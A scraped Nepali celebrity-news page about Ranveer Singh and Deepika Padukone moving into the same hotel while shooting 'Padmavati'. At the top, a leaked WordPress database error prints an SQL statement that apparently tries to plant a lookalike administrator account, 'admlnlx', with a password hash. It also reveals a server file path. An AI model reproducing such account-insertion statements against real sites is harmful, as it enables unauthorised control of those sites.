WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvqiWQQdjYIRVhmNn9YI81Sv2PFqYY.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 16:58:43', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
बिहे अघि नै एउटै होटलमा रणवीर–दीपिका बस्नुको कारण पर्दाफास – Gaule Khabar

बिहे अघि नै एउटै होटलमा रणवीर–दीपिका बस्नुको कारण पर्दाफास

बिहे अघि नै एउटै होटलमा रणवीर–दीपिका बस्नुको कारण पर्दाफास

एजेन्सी । बलिउडमा निर्देशक तथा निर्माता सञ्जयलीला भन्सालीलाई ‘रिसाहा’ निर्देशकका रूपमा चिनिन्छ ।कामको समयमा अरू केही कुरा सुन्न नचाहने भएकाले पनि उनीसँग काम गर्दा धेरै अभिनेता तथा अभिनेत्री सचेत हुन्छन् । अब यही कुरा अभिनेता रणवीर सिंह र अभिनेत्री दीपिका पादुकोणमा पनि लागू भएको छ ।

अहिले यी दुई फिल्म ‘पद्मावती’को सुटिङमा व्यस्त छन् । फिल्ममा प्रमुख भूमिका निर्वाह गरेका यी दुई सुटिङ स्पट अत्यन्त टाढा भएपछि होटेलमा सर्दै छन् ।

प्रभादेवी अपार्टमेन्टबाट दीपिका होटेलमा सरिसकेको र रणवीर पनि त्यही होटेलमा जाने विषयलाई अहिले भारतीय मिडियाले प्राथमिकताका साथ प्रकाशन गरेका छन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका